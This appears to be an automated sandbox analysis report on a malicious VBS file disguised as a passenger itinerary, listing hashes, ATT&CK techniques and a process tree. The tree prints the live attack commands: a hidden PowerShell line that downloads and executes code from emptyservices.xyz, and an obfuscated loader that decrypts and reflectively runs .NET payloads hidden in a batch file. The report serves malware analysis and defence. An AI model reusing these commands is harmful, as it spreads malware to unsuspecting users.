6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663

General

Target

Passenger Itinerary.vbs
Size

78KB
MD5

f5bfac09b17af66506e500ce22c71f92
SHA1

bf949f2cb7457bcc173e0b98f656be133a088225
SHA256

6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663
SHA512

5cab281eae07d317c02f031986b472967b4ffdca1dc3343d4e697f1ae1d8503ba237e5e1c7b60b55154f29421f7d3c79e1f125b56f96b98bcd58fa1677756d26
SSDEEP

1536:9dKIP+7Eys+3Xe05WVD8/PSfxDrtlsMKePYPm9nPJ6oMM:9dKIP8EyF3rqD8/2xvtBP0InR6NM

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2576	powershell.exe
2860	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2576	powershell.exe
2860	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1740 wrote to memory of 2576	1740	WScript.exe	30
PID 1740 wrote to memory of 2576	1740	WScript.exe	30
PID 1740 wrote to memory of 2576	1740	WScript.exe	30
PID 1740 wrote to memory of 2652	1740	WScript.exe	33
PID 1740 wrote to memory of 2652	1740	WScript.exe	33
PID 1740 wrote to memory of 2652	1740	WScript.exe	33
PID 2652 wrote to memory of 2744	2652	cmd.exe	35
PID 2652 wrote to memory of 2744	2652	cmd.exe	35
PID 2652 wrote to memory of 2744	2652	cmd.exe	35
PID 2652 wrote to memory of 2860	2652	cmd.exe	36
PID 2652 wrote to memory of 2860	2652	cmd.exe	36
PID 2652 wrote to memory of 2860	2652	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Passenger Itinerary.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2576
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mvtIQEpeE2igYXIdDEEHrUp8bEsGaEVGh0sp8SAhblA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vT8eb5DW9nWYQVd4hxOXDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GQouJ=New-Object System.IO.MemoryStream(,$param_var); $OJwfz=New-Object System.IO.MemoryStream; $jgIod=New-Object System.IO.Compression.GZipStream($GQouJ, [IO.Compression.CompressionMode]::Decompress); $jgIod.CopyTo($OJwfz); $jgIod.Dispose(); $GQouJ.Dispose(); $OJwfz.Dispose(); $OJwfz.ToArray();}function execute_function($param_var,$param2_var){ $zmCZQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $brFtT=$zmCZQ.EntryPoint; $brFtT.Invoke($null, $param2_var);}$tofzw = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $tofzw;$UpwQA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tofzw).Split([Environment]::NewLine);foreach ($ZFAFd in $UpwQA) { if ($ZFAFd.StartsWith('hSymiLYPJtzQULYISQvX')) { $aTuto=$ZFAFd.Substring(20); break; }}$payloads_var=[string[]]$aTuto.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
cc49ce3b6a2c61afa08d46410a78514a

SHA1
2a0f7a3890ee4844194715d83aa6bf771250e9d6

SHA256
26f4a4fe560cd59fdcaf064f059865da9b9723b7f8c8480e3e6bd8ccd6b3faf7

SHA512
f785cb451bb0ecfd554e65152652222860803e560ebe06a526c7f17b3bdeda9033a29a0250f97450b37bdf9d34599ccb9e5cb57fd97e46b83140076557b19d0b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
72667de79774e34f56abfe58a942dcdb

SHA1
073e01acc366f34cf8465739b7ab1bdf471c64ca

SHA256
32ac1ef9a4cad40509efbcb0597f6c248cde3db9562400a521e27d6361c9c54d

SHA512
e370039af18b6b57412b823114b3d2da11d0036c3f720c3f4c08a9ccab7e3d6fe505d0e7012147a4ac9ba4c577fd2c9afd0b4454bcc402cdadf5d6ccb9d71a28

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y6G00YM4L335JG19427D.temp

Filesize
7KB

MD5
d94c8f15b07e44cc6a4d593dc49d181d

SHA1
e6b08ad8cd85fe66f029aa10bcb1d2e2e32b945f

SHA256
4134e1121921308e61b361f4ae10d4546226f25e6e0a48f080600f44c7242b46

SHA512
77717bd61917d4bc9cea0bfaa367561d026b60e5922c25a44cb3d890bf7f0c701175ad8a6aa99e915a0605eadc457384cee8349027b78263799d4b5d28e2d647

Download Submit
memory/2576-4-0x000007FEF540E000-0x000007FEF540F000-memory.dmp

Filesize
4KB

Download
memory/2576-5-0x000000001B530000-0x000000001B812000-memory.dmp

Filesize
2.9MB

Download
memory/2576-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2576-7-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2576-9-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2576-8-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2576-10-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2860-25-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/2860-26-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing